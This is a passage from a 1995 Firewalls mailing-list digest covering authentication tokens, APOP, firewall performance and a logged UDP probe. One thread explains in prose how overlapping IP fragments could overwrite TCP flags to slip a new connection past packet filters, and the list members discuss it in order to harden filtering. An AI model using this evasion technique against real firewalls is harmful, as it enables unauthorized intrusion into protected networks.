I agree with your risk/benefit analysis. Even if soft tokens offer only a dynamic single-factor ID authentication, as I believe, God knows they're badly needed! I'd also argue that real tokens are necessary when risk is more than random, and the assets to be protected are attractive targets for intruders or looters. (I seriously doubt that soft-token client software -- holding all the secrets -- would long withstand a determined attack by a Padgett Peterson or his peer.) Suerte, _Vin -- Vin McLellan +The Privacy Guild+ USA Tel. (617) 884-5546 Mail: 53 Nichols St., Chelsea, Ma. 02150 '''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''' ''''''' From firewalls-owner Wed May 10 13:09:35 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA27633 for firewalls-outgoing; Wed, 10 May 1995 13:04:15 -0700 Received: from dg-rtp.dg.com (dg-rtp.rtp.dg.com [128.222.1.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id NAA27628 for ; Wed, 10 May 1995 13:04:12 -0700 Received: from wellspring.us.dg.com by dg-rtp.dg.com (5.4R2.01/dg-rtp-v02) id AA11041; Wed, 10 May 1995 16:04:44 -0400 Received: from immis184 by wellspring.us.dg.com (5.4.1/dg-gens08) id AA04618; Wed, 10 May 1995 16:04:41 -0400 Message-Id: <9505102004.AA04618@wellspring.us.dg.com> Comments: Authenticated sender is From: "Jim Carroll" Organization: Data General (Canada) Inc. To: firewalls@greatcircle.com Date: Wed, 10 May 1995 16:04:32 -0500 Subject: Re: impossible vs. impractical Reply-To: jcarroll@wellspring.us.dg.com Priority: normal X-Mailer: Pegasus Mail for Windows (v2.0-WB1) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk What the hell does this have to do with firewalls? -- Jim Carroll - jcarroll@wellspring.us.dg.com ... the usual disclaimers ... ## Life is like a boxing chocolate ## From firewalls-owner Wed May 10 13:49:05 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA27516 for firewalls-outgoing; Wed, 10 May 1995 13:00:16 -0700 Received: from inesc.inesc.pt (inesc.inesc.pt [146.193.0.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id NAA27502 for ; Wed, 10 May 1995 13:00:07 -0700 Received: from ccae-sv.inesc.pt by inesc.inesc.pt with SMTP; id AA21350 (/); Wed, 10 May 1995 21:57:29 +0200 Received: from beatle by ccae-sv.inesc.pt (4.1/SunOS4.1.3) id AA08148; Wed, 10 May 95 22:00:30 +0200 Message-Id: <9505102000.AA08148@ccae-sv.inesc.pt> Comments: Authenticated sender is From: "Ricardo Jorge Pereira" Organization: CCAE To: firewalls@GreatCircle.com Date: Wed, 10 May 1995 21:16:10 +0000 Subject: xinetd on HP-UX ? Reply-To: ricardo.pereira@inesc.pt Priority: normal X-Mailer: Pegasus Mail for Windows (v2.0-WB3) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I know this isn't the best place for this, but I really need an answer for this. Please do not reply to the list, send it to me directly. Thanks in advance __________________________________________________________________ Ricardo Jorge Pereira Network Consultant Centro de Comunicacoes em Ambientes Empresariais Av. Duque d'Avila 23, Apartado 10105, 1017 Lisboa Codex, Portugal Telef : +351 1 3100069 Fax : +351 1 3100068 email : ricardo.pereira@inesc.pt ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Microsoft is not the answer, Microsoft is the question. No is the answer. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From firewalls-owner Wed May 10 14:06:54 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA26811 for firewalls-outgoing; Wed, 10 May 1995 12:43:39 -0700 Received: from nps.navy.mil (nps.navy.mil [131.120.254.52]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id MAA26806 for ; Wed, 10 May 1995 12:43:35 -0700 Received: from sabik.cc.nps.navy.mil ([131.120.50.159]) by nps.navy.mil (4.1/SMI-4.1) id AA11546; Wed, 10 May 95 12:42:17 PDT Date: Wed, 10 May 95 12:42:17 PDT From: mhpham@nps.navy.mil (Michael Pham) Message-Id: <9505101942.AA11546@nps.navy.mil> To: Firewalls@GreatCircle.COM Subject: Re: Firewalls/Filters Sender: firewalls-owner@GreatCircle.COM Precedence: bulk ----- Begin Included Message ----- From Brent@GreatCircle.COM Tue May 9 20:52:17 1995 X-Sender: brent@miles.greatcircle.com Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Tue, 9 May 1995 20:52:37 -0800 To: mhpham@nps.navy.mil (Michael Pham) From: Brent@GreatCircle.COM (Brent Chapman) Subject: Re: Firewalls/Filters Content-Length: 737 At 2:33 PM 5/9/95, Michael Pham wrote: >Hello Brent, > >What Packet filters would deal w/ ATM packet frame authentications! > >Thanks -- Michael I have no idea; I've never worked with ATM. Suggest you ask Firewalls@GreatCircle.COM. -Brent ---------------------------------------------------------------------- For info about the Internet Security Firewalls Tutorial and a schedule of upcoming dates, please send email to Tutorial-Info@GreatCircle.COM ---------------------------------------------------------------------- Brent Chapman Great Circle Associates Brent@GreatCircle.COM 1057 West Dana Street +1 415 962 0841 Mountain View, CA 94041 ----- End Included Message ----- From firewalls-owner Wed May 10 14:26:20 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA27542 for firewalls-outgoing; Wed, 10 May 1995 13:00:48 -0700 Received: from npt.nuwc.navy.mil (NPT.NUWC.NAVY.MIL [129.190.70.100]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id NAA27537 for ; Wed, 10 May 1995 13:00:45 -0700 Received: from sun811 by npt.nuwc.navy.mil with SMTP ; Wed, 10 May 95 15:33:27 EDT Received: by sun811 (5.x/SMI-SVR4) id AA02851; Wed, 10 May 1995 15:32:04 -0400 Date: Wed, 10 May 1995 15:32:04 -0400 From: jhb@sun811.npt.nuwc.navy.mil (John Balch) Message-Id: <9505101932.AA02851@sun811> To: firewalls@greatcircle.com Subject: Liable for Security X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > Ian rites: > >Therefore a court may take the view that a company which has already > >considered, or adopted, technology such as a firewall already admits > >knowledge of all potential risks and has accepted responsibility for > >preventing them. The result could then be that in two actions which are > >functionally similar, the company which did not take any risk management > >actions suffers less than the company which spent a fortune on risk > >reduction technology that did not prevent the incident. > > Still not allowed to have an opinion but would seem that if the sewer could > show that the sooie (or some responsible individual) did know of the risks > (and subscription to the FIREWALLs list might be an indication) then the > effect would be reversed. "Shoulda knowed" is the "culpable" part. > > Does sound like high comedy though. Can see the solicitor advising a client: > "Now here we need to prove that you, the CIO of a sucessful multi-billion > dollar company, are an idiot." > > Warmly, > Padgett > Many people in high places are willing (even eager) to look like idiots if they can evade fines and/or jail time. It started with the man Gore Vidal used to call "Acting President Reagan" and runs in a very crooked line down to the former Treasurer of Orange County. (Not strictly firewall stuff, but I couldn't resist.) John Balch GPS Technologies, Inc. 25 Enterprise Center Middletown RI 02842 From firewalls-owner Wed May 10 14:44:40 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA29584 for firewalls-outgoing; Wed, 10 May 1995 13:52:09 -0700 Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id MAA29315 for ; Tue, 9 May 1995 12:48:26 -0700 Received: from blackhole.milkyway.com by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-950507) id MAA28750; Tue, 9 May 1995 12:47:24 -0700 Received: from localhost (uucp@localhost) by blackhole.milkyway.com (8.6.5/8.6.6) id PAA00154 for ; Tue, 9 May 1995 15:55:54 -0400 Received: from jupiter.milkyway.com(192.168.77.9) by internet.milkyway.com via smap (V1.3) id sma000148; Tue May 9 15:55:44 1995 Received: from metis.milkyway.com (mcr@metis.milkyway.com [192.168.77.21]) by jupiter.milkyway.com (8.6.7/8.6.6) with ESMTP id PAA18434; Tue, 9 May 1995 15:50:17 -0400 From: Michael Richardson Received: by metis.milkyway.com (8.6.9/BSDI-Client) id PAA00949; Tue, 9 May 1995 15:58:06 -0400 Date: Tue, 9 May 1995 15:58:06 -0400 Message-Id: <199505091958.PAA00949@metis.milkyway.com> To: alan@mid.NET Subject: Re: SNMP list consolidated Newsgroups: milkyway.mail.firewalls In-Reply-To: <199505091615.LAA23178@noc1.mid.net> Organization: Milkyway Networks Corporation Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In article <199505091615.LAA23178@noc1.mid.net> you write: > Michael, perhaps you'd care to subscribe the people in your list onto the >mailing list at midnet by scripting a mass subscribe. Done. I had near 70 subscriptions. I think it might be too big ;-) -- :!mcr!: | Milkyway Networks Corporation Michael Richardson | Makers of the Black Hole firewall NCF: aa714 || xx714 | +1 613 566-4574 ... mcr@milkyway.com Home: mcr@sandelman.ocunix.on.ca. PGP key available. From firewalls-owner Wed May 10 14:56:39 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA28075 for firewalls-outgoing; Wed, 10 May 1995 13:17:17 -0700 Received: from BBN.COM (BBN.COM [128.89.0.122]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id NAA28068 for ; Wed, 10 May 1995 13:17:14 -0700 Received: from archetype.prospect.com by BBN.COM id aa09764; 10 May 95 16:11 EDT Received: from sol.atype.com by atype.com (NX5.67d/NX3.0M) id AA18014; Wed, 10 May 95 16:11:05 -0400 Received: from titan by sol.atype.com (NX5.67d/NeXT-2.0) id AA25977; Wed, 10 May 95 16:11:03 -0400 From: deh@atype.com (David E. Hollingsworth) Message-Id: <9505102011.AA25977@ sol.atype.com > Received: by titan.atype.com (NX5.67d/NX3.0X) id AA03471; Wed, 10 May 95 16:11:03 -0400 Date: Wed, 10 May 95 16:11:03 -0400 Received: by NeXT.Mailer (1.100) Received: by NeXT Mailer (1.100) To: mjsus@atlanta.com (Markku Saarelainen) Subject: Re: Real Case: 0.01 % probability Cc: firewalls@greatcircle.com Reply-To: deh@atype.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >As this example shows the structured and organized Information >Security System can prevent potential damages in an overall >information system, and without the Information Security System the >probability of these damages happening is much higher. Hurm. It seems to me that what the example shows is that high-falutin' phrases like "Information Security System Manual" don't protect one from lapses of common sense. It's all well and good for the "Business Analyst and Developer" to follow the "Information Security Program", but it's simply not a good idea to keep a machine plugged into a socket controlled by a light switch. I imagine that the new, reengineered, manual won't mention anything about not storing equipment in unused, but operative, sinks. But if I found such a situation (or the light switch situation) at my installation, I'd be livid. Someone's going to turn that faucet handle eventually, and all of the references to manuals, programs, and pure human error won't erase the fact that it was just plain dumb for that equipment to be there in the first place. Security procedures are useful, but they're tools, not crutches. --deh! David Hollingsworth deh@atype.com From firewalls-owner Wed May 10 15:12:02 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA27903 for firewalls-outgoing; Wed, 10 May 1995 13:11:19 -0700 Received: from [198.102.244.36] (quadra.greatcircle.com [198.102.244.36]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id NAA27892; Wed, 10 May 1995 13:11:12 -0700 X-Sender: brent@miles.greatcircle.com Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Wed, 10 May 1995 13:12:01 -0800 To: Robert Bonomi , fc@all.net From: Brent@GreatCircle.COM (Brent Chapman) Subject: Re: impossible vs. impractical Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk What the hell does this have to do with Firewalls? I STRONGLY object to people exporting flame wars from BugTraq to Firewalls. KNOCK IT OFF! -Brent At 1:02 AM 5/10/95, Robert Bonomi wrote: > From owner-bugtraq@fc.net Tue May 9 17:55:24 1995 > Received: from sprawl.fc.net by delta.eecs.nwu.edu (8.6.12/8.6.12) >with ESMTP id RAA25223 for ; Tue, 9 May 1995 >17:55:21 -0500 > Received: from freeside.fc.net (freeside.fc.net [198.6.198.2]) by >sprawl.fc.net (8.6.10/8.6.10) with ESMTP id FAA15664 for >; Mon, 8 May 1995 05:46:25 -0500 > Received: (from majordom@localhost) by freeside.fc.net >(8.6.8.1/8.6.6) id FAA24207 for bugtraq-outgoing; Mon, 8 May 1995 05:48:27 >-0500 > Received: from all.net (all.net [204.7.229.1]) by freeside.fc.net >(8.6.10/8.6.6) with SMTP id FAA24195 for ; Mon, 8 May 1995 >05:48:20 -0500 > From: fc@all.net (Dr. Frederick B. Cohen) > Received: by all.net (4.1/3.2.012693-Management Analytics); > id AA07209 for bugtraq@fc.net; Mon, 8 May 95 06:42:48 EDT > Message-Id: <9505081042.AA07209@all.net> > Subject: Re: impossible vs. impractical > To: mcn@EnGarde.com (Mike Neuman) > Date: Mon, 8 May 1995 06:42:47 -0400 (EDT) > Cc: bugtraq@fc.net > In-Reply-To: <199505080429.XAA13309@guardian.EnGarde.com> from >"Mike Neuman" at May 7, 95 11:29:15 pm > X-Mailer: ELM [version 2.4 PL22] > Content-Type: text > Content-Length: 946 > Sender: owner-bugtraq@fc.net > Precedence: bulk > Status: R > > > Oh good. I think possibility has practicality implied. After >all, if you > > can generate an infinite amount of energy, you CAN go the speed >of light > > (according to the current laws of physics), so there, it's not >impossible. > > But according to current physics, there is a finite amount of total > energy in the Universe, and thus it is impossible to get the infinite > energy required to do this - again, impossible, not infeasible. > >WRONG! the 'total energy in the universe is finite' is an UNPROVEN assumption. > >I'll grant 'consistant with the currently-held *theories*', but that's all. >Those 'thoeries' are just that, however THEORIES, and by their very nature >*un-provable* in a formal sense. They are accepted *only* because no one >has _yet_ come up with a 'dis-proof by counter-examble'. ---------------------------------------------------------------------- For info about the Internet Security Firewalls Tutorial and a schedule of upcoming dates, please send email to Tutorial-Info@GreatCircle.COM ---------------------------------------------------------------------- Brent Chapman Great Circle Associates Brent@GreatCircle.COM 1057 West Dana Street +1 415 962 0841 Mountain View, CA 94041 From firewalls-owner Wed May 10 16:46:14 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA04227 for firewalls-outgoing; Wed, 10 May 1995 16:19:49 -0700 Received: from eden.telalink.net (eden.telalink.net [199.1.88.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id QAA04222 for ; Wed, 10 May 1995 16:19:46 -0700 Received: from netblazer1-s16.telalink.net (netblazer1-s16.telalink.net [199.1.88.144]) by eden.telalink.net (8.6.10/A/UX 3.1.1) with SMTP id SAA13950 for ; Wed, 10 May 1995 18:24:19 -0500 Date: Wed, 10 May 1995 18:24:19 -0500 Message-Id: <199505102324.SAA13950@eden.telalink.net> From: "Jason M. LeBlanc" To: firewalls@greatcircle.com Subject: Good all encompassing security guide X-Mailer: ProntoIP [version 1.03] Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I know that's a misnomer... I need security info concerning the internet and NT servers, very new to the internet from a server standpoint, so don't beat me too hard. Something like 1. plug the thing in... 2. turn it on... 3. click on make me secure..., anything like that out there? Course not. But still looking... Appreciate any help. Thanks Jason M. LeBlanc foxhunter@telalink.net MIS Last Straw Communications From firewalls-owner Wed May 10 21:39:19 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id VAA06972 for firewalls-outgoing; Wed, 10 May 1995 21:21:47 -0700 Received: from mig.com (Mig-ACIFR.co.westnet.net [198.59.90.6]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id VAA06966 for ; Wed, 10 May 1995 21:21:44 -0700 From: jpf@mig.com (Jack Flory) Message-Id: <199505110422.WAA16152@mig.com> Subject: A Probe? To: firewalls@greatcircle.com Date: Wed, 10 May 1995 22:22:19 -0600 (MDT) X-Mailer: ELM [version 2.4 PL24] Content-Type: text Content-Length: 2034 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Forgive me for my lapses... I have not subscribed to the list for some time. However, I ran across the following sequence in my log files and I thought some of you might have a few ideas about the pattern. Does this appear to be an organized probe? This is one of the few irregularities that I have not been able to trace to routing flaps due to Internet restructuring. Please reply directly to keep the S/N ratio low. ThankX. May 10 20:54:11 gateway screend[4377]: REJECT: UDP [204.240.1.23]->[204.132.146.71](2769->7) May 10 20:54:11 gateway kernel: REJECT (IN): UDP [204.240.1.23]->[204.132.146.17](2715->7) ulen 13 on eth0 May 10 20:54:11 gateway screend[4377]: REJECT: UDP [204.240.1.23]->[204.132.146.52](2750->7) May 10 20:54:11 gateway screend[4377]: REJECT: UDP [204.240.1.23]->[204.132.146.39](2737->7) May 10 20:54:11 gateway screend[4377]: REJECT: UDP [204.240.1.23]->[204.132.146.90](2788->7) May 10 20:54:11 gateway screend[4377]: REJECT: UDP [204.240.1.23]->[204.132.146.109](2807->7) May 10 20:54:11 gateway screend[4377]: REJECT: UDP [204.240.1.23]->[204.132.146.129](2827->7) May 10 20:54:11 gateway screend[4377]: REJECT: UDP [204.240.1.23]->[204.132.146.149](2847->7) May 10 20:54:11 gateway screend[4377]: REJECT: UDP [204.240.1.23]->[204.132.146.169](2867->7) May 10 20:54:11 gateway screend[4377]: REJECT: UDP [204.240.1.23]->[204.132.146.190](2888->7) May 10 20:54:11 gateway screend[4377]: REJECT: UDP [204.240.1.23]->[204.132.146.210](2908->7) May 10 20:54:11 gateway screend[4377]: REJECT: UDP [204.240.1.23]->[204.132.146.229](2927->7) May 10 20:54:11 gateway screend[4377]: REJECT: UDP [204.240.1.23]->[204.132.146.250](2948->7) The source appears to be a CIDR block on PSI. -- ============================================================= Jack Flory Migration Associates Corp. Phone: +1.719.488.0247 19935 Hamal Drive FAX: +1.719.481.8718 Monument, CO 80132-9717 email: jpf@mig.com ============================================================= From firewalls-owner Wed May 10 23:09:46 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id WAA08261 for firewalls-outgoing; Wed, 10 May 1995 22:50:09 -0700 Received: from tuna.wang.com (tuna.wang.com [150.124.136.4]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id WAA08256 for ; Wed, 10 May 1995 22:50:06 -0700 Received: from elf.wang.com by tuna.wang.com with SMTP id AA00767 (5.67b/IDA-1.5 for ); Thu, 11 May 1995 01:50:44 -0400 Received: from fnord.wang.com by elf.wang.com with SMTP id AA26775 (5.67a/IDA-1.5 for ); Thu, 11 May 1995 01:49:09 -0400 Received: by fnord.wang.com (5.67a/TF8) id AA19261; Thu, 11 May 1995 01:50:36 -0400 Date: Thu, 11 May 1995 01:50:36 -0400 From: Tom Fitzgerald Message-Id: <199505110550.AA19261@fnord.wang.com> To: firewalls@greatcircle.com Subject: Re: IP packet filtering... Sender: firewalls-owner@GreatCircle.COM Precedence: bulk avalon@coombs.anu.edu.au (Darren Reed) writes: >>> Somewhat luckily for filtering, in TCP and UDP packets the port numbers >>> are almost assured of being in the first fragment. The "established" >>> bit can be in the 2nd or 3rd. And you *CAN* make a TCP connection with an >>> MTU of 28, successfully - I've done it. No argument, but RFC 791 says "Every internet module must be able to forward a datagram of 68 octets without further fragmentation", so it should always be safe to toss fragments smaller than that. > To this, I might add, it is rather fortunate that all reassembly > routines I've examined so far use the "hole-filling" paradigm (RFC815). > Had the one in the original RFC (791) been in common use, it would have > been a lot less cosy doing packet filtering :-/ Hmmmm.... while you're right that RFC 791's reassembly algorithm is broken, I'm not sure that RFC 815 fixes it. Filtering breaks if data from one fragment is allowed to overwrite overlapping data from another fragment with a lower fragment-offset, and RFC 815 doesn't seem to prohibit this. The BSD/OS reassembly algorithm, for one, definitely does the right thing. It goes to some trouble to make sure that when fragments overlap, the fragment with the lower offset overwrites fragments with higher offset. If the reassembly algorithm was broken (like RFC 791's), it could be exploited by cooking up two overlapping fragments: one having a complete TCP header harmless enough to get through the firewall (for example ACK=1 to get through an "established" filter), and the second fragment beginning in the middle of the TCP header, overwriting the flags to set ACK=0, to open a new connection inbound through the firewall. The second fragment would have offset>0, so the TCP filtering wouldn't be applied to it. This trick can't fake the source and destination port numbers, they're too close to the beginning of the TCP header, but it can fake anything else. -- Tom Fitzgerald 1-508-967-5278 Wang Labs, Lowell MA, USA fitz@wang.com From firewalls-owner Thu May 11 01:16:28 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id AAA10493 for firewalls-outgoing; Thu, 11 May 1995 00:59:54 -0700 Received: from disperse.demon.co.uk (disperse.demon.co.uk [158.152.1.77]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id AAA10488 for ; Thu, 11 May 1995 00:59:50 -0700 Received: from post.demon.co.uk by disperse.demon.co.uk id aa01112; 11 May 95 8:27 GMT-60:00 Received: from roverpte.demon.co.uk by post.demon.co.uk id aa06991; 11 May 95 8:27 GMT-60:00 Received: from boiled.rover.com by roverpte.demon.co.uk (5.65c) id AA13683; Wed, 10 May 1995 16:54:54 +0100 Received: by boiled.rover.com (5.65c) id AA04199; Wed, 10 May 1995 16:48:36 +0100 Message-Id: <199505101548.AA04199@boiled.rover.com> To: firewalls@greatcircle.com Subject: apop Date: Wed, 10 May 95 16:48:35 +0100 From: Lyndon David Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Dear all, I am looking at logging in via pop3 from across the net. Obviously I dont want to use the standard pop3 as this sends the password in plain text, what I do want is to use one time passwords, perferably Skey. I have heard about apop which does one time passwords for pop3 and can be used with Eudora. A search of archie only revealed add ons for the mac eudora and no sign of a server. Can anyone tell me if this is available for the PC version and where I can get the server from ? I am not woried about people looking at the mail as it moves across the net as I figured that it was sent in plain text anyway. I just dont want someone picking up the password. Thanks Lyndon David From firewalls-owner Thu May 11 01:41:10 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id AAA10000 for firewalls-outgoing; Thu, 11 May 1995 00:40:45 -0700 Received: from relay.xlink.net (relay.xlink.net [193.141.40.5]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id AAA09994 for ; Thu, 11 May 1995 00:40:42 -0700 Received: from nixe.ISAR.net by relay.xlink.net id <27947-0@relay.xlink.net>; Thu, 11 May 1995 09:40:53 +0000 Received: from GeNUA.DE (Ugenua@localhost) by nixe.isar.net (8.6.12/ni-1.2) with UUCP id JAA01686; Thu, 11 May 1995 09:40:46 +0200 Received: from localhost.GeNUA.DE by Woozle.GeNUA.DE with SMTP id AA23158 (5.65c/IDA-1.4.4); Thu, 11 May 1995 09:20:20 +0200 Message-Id: <199505110720.AA23158@Woozle.GeNUA.DE> To: nto2584@tserver.dsac.dla.mil (Steven Payne) Cc: toreh@sds.no (toreh), firewalls@greatcircle.com Subject: Re: If you've got nothing to do, don't do it here (was Re: Pentagon security professionals) In-Reply-To: Your message of "Tue, 09 May 95 09:41:01 EDT." <9505091341.AA07421@tserver.dsac.dla.mil> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Thu, 11 May 1995 09:20:18 +0200 From: Bernhard Schneck Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In message <9505091341.AA07421@tserver.dsac.dla.mil>you write: > NOTE 1:We are using a 486 running BSDI with 12 Mg of ram, unfortunately the > 486 has no level 2 cache right now, it is on order (256K), and I know > this will tremendously improve the OS' throughput. Also the cpu is > only a DX33. I got FTP tranfer rates between 200 and 250kByte/sec between the following systems: source: DECstation 5000/200 (R3000), 32MB, on-board ethernet (ln0) sink: DECstation 5000/240 (R3000), 64MB (?), on-board ethernet (ln0) gate: 486DX33, 16MB, 128kb cache, 200MB IDE, 2 SMC Elite Ultra BSD/OS2.0, FWTK 1.3 Note this was observed doing standard file transfers during an installation, not any real preformance measurements and without tuning. Also, this was using a single FTP connetction through ftp-gw with maybe some other traffic going on, but probably not too much (I didn't check this). This should be enough up to about E1 speeds (2Mbit/sec). For this installation, it certainly was, as there is only a 64kBit/sec WAN line to the network provider. \Bernhard. From firewalls-owner Thu May 11 03:09:27 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id DAA13473 for firewalls-outgoing; Thu, 11 May 1995 03:03:31 -0700 Received: from relay1gw.alcatel.fr (relay1gw.alcatel.fr [193.104.30.53]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id DAA13468 for ; Thu, 11 May 1995 03:03:26 -0700 Received: from istans.ansf.alcatel.fr by relay1gw.alcatel.fr with SMTP (1.37.109.8/16.2) id AA13153; Thu, 11 May 1995 12:02:44 +0200 Received: from by istans.ansf.alcatel.fr (4.1/SMI-4.1) id AB26713; Thu, 11 May 95 12:05:24 +0200 Message-Id: <9505111005.AB26713@istans.ansf.alcatel.fr> From: "Kare Presttun" Organization: Alcanet International To: Firewalls@GreatCircle.COM Date: Thu, 11 May 1995 12:04:17 CET Subject: One time password token Priority: normal X-Mailer: Pegasus Mail/Windows (v1.22) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security) Date: Sun, 7 May 95 08:18:03 -0400 Subject: One Time Password Tokens >Basically there are two types of tokens today, time synchronous and >challenge response. Both work well (one went white water rafting There are two classes of tokens, asynchronous (challenge/response) ans synchronous. There are two possible synchronizations schemes, time and history. Secure ID use the first, and the new tokens from Enigma Logic use the latter. One benefit of history synchronism is that there is no need to synchronize the clocks, and another is that the password is valid just once, not within a time window. >The time synchronous are the easiest to use, just read off a number and >type it in plus a PIN, the biggest problem being drift and a "window of The history synchronous are just as easy to use. Kare ================================================================ * Kare Presttun Tel: +33 1 4058 5614 * * Alcanet International Fax: +33 1 4058 5945 * * 33, rue Emeriau Kare.Presttun@ansf.alcatel.fr * * F-75015 Paris * * France * ================================================================ From firewalls-owner Thu May 11 03:27:16 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id DAA13479 for firewalls-outgoing; Thu, 11 May 1995 03:03:36 -0700 Received: from relay1gw.alcatel.fr (relay1gw.alcatel.fr [193.104.30.53]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id DAA13474 for ; Thu, 11 May 1995 03:03:31 -0700 Received: from istans.ansf.alcatel.fr by relay1gw.alcatel.fr with SMTP (1.37.109.8/16.2) id AA13148; Thu, 11 May 1995 12:02:43 +0200 Received: from ahqp14.ansf.alcatel.fr ([155.132.120.211]) by istans.ansf.alcatel.fr (4.1/SMI-4.1) id AA26713; Thu, 11 May 95 12:05:23 +0200 Message-Id: <9505111005.AA26713@istans.ansf.alcatel.fr> From: "Kare Presttun" Organization: Alcanet International To: Firewalls@GreatCircle.COM Date: Thu, 11 May 1995 11:51:43 CET Subject: One time password token Priority: normal X-Mailer: Pegasus Mail/Windows (v1.22) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk ------------------------------ From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security) Date: Sun, 7 May 95 08:18:03 -0400 Subject: One Time Password Tokens Basically there are two types of tokens today, time synchronous and challenge response. Both work well (one went white water rafting The correct statement is that there are two classes of tokens, asynchronous ans synchronous. The first one is what is called challenge response. The second category contains two technologies, time synchronous and history synchronous. The secure ID is time synchronous, and the new tokens from Enigma Logic can operate in both asynchronous and history synchronous mode (nice technology Bob). The history synchronous technology does not have the drawback that the password is valid within a time window. in Alaska with a SecurID in my wallet - it survived and have been using the same SafeWord for over four years now) and each has limitations/ strengths. The time synchronous are the easiest to use, just read off a number and The history synchronous works exactly the same way for the user. Kare ================================================================ * Kare Presttun Tel: +33 1 4058 5614 * * Alcanet International Fax: +33 1 4058 5945 * * 33, rue Emeriau Kare.Presttun@ansf.alcatel.fr * * F-75015 Paris * * France * ================================================================ From firewalls-owner Thu May 11 03:40:33 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id CAA13413 for firewalls-outgoing; Thu, 11 May 1995 02:59:51 -0700 Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id CAA13408 for ; Thu, 11 May 1995 02:59:44 -0700 Message-Id: <199505110959.CAA13408@miles.greatcircle.com> Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA172596447; Thu, 11 May 1995 20:00:47 +1000 From: Darren Reed Subject: Re: IP packet filtering... To: fitz@wang.com (Tom Fitzgerald) Date: Thu, 11 May 1995 20:00:47 +1000 (EST) Cc: firewalls@greatcircle.com In-Reply-To: <199505110550.AA19261@fnord.wang.com> from "Tom Fitzgerald" at May 11, 95 01:50:36 am X-Mailer: ELM [version 2.4 PL23] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 2171 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In some mail from Tom Fitzgerald, they said: > > avalon@coombs.anu.edu.au (Darren Reed) writes: > > >>> Somewhat luckily for filtering, in TCP and UDP packets the port numbers > >>> are almost assured of being in the first fragment. The "established" > >>> bit can be in the 2nd or 3rd. And you *CAN* make a TCP connection with an > >>> MTU of 28, successfully - I've done it. > > No argument, but RFC 791 says "Every internet module must be able to > forward a datagram of 68 octets without further fragmentation", so it > should always be safe to toss fragments smaller than that. > What about final fragments ? But then they won't have IP_MF set.. > > routines I've examined so far use the "hole-filling" paradigm (RFC815). > > Had the one in the original RFC (791) been in common use, it would have > > been a lot less cosy doing packet filtering :-/ > > Hmmmm.... while you're right that RFC 791's reassembly algorithm is > broken, I'm not sure that RFC 815 fixes it. Filtering breaks if data from > one fragment is allowed to overwrite overlapping data from another fragment > with a lower fragment-offset, and RFC 815 doesn't seem to prohibit this. > > The BSD/OS reassembly algorithm, for one, definitely does the right thing. > It goes to some trouble to make sure that when fragments 